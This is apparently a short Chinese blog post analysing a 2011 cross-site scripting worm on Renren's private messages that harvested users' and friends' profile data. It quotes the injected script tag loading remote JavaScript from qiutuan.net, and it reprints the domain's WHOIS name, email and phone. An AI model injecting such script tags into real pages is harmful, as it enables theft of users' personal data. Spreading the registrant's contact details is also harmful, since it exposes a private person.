人人网遭受站内信跨站攻击,这事真有发生?

人人网在30号凌晨开始,发生一场大规模资料泄露事件. 黑客使用人人网在站内信内容过滤不严的漏洞执行了一段远程代码, 打开站内信后会自动发送自己以及好友的个人资料,同时扩散这封站内信.

今天收到三份主题为<有人暗恋你哦,你想知道TA是谁么> 的站内信,

开始以为是游戏应用的推广方式,但是打开后发现有问题 ,通过查看站内信网页源码,发现其中有一行代码<script src=’http://qiutuan.net/2011/51.js’>,它通过利用人人网的代码解析方式问题, 将本不该在文本中执行的代码执行了 .分析代码后发现其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,然后通过通讯录功能,得到所有好友名片中的上述信息,然后将所有信息发送到作者的网站上.

另外在代码中关于发送站内信的函数megaboxx.submit_prehook并不是人人网本身的函数, 而是来自于facebook.

人人网最初的措施是将指向的网址设为敏感词.

凌晨3点半左右, 人人开始清理站内信. 但是这个漏洞依然存在.

这一波资料泄露到此结束.    下一波何时到来?
—————————————————————————-

黑客利用的域名qiutuan.net的注册信息

dasha, wang dasha811@gmail.com
hubeishengwuhanshi
wuhan, 518089
China
+1.18603051234 Fax –

注册地址是湖北武汉.  但是邮编显示为深圳

————————————————————————

当然看域名注册信息是没用的,黑客不是良民。不会真的信息注册或者备案。

 



更多

留下足迹

网站地图 鲁ICP备11008518号-1

无觅相关文章插件,快速提升流量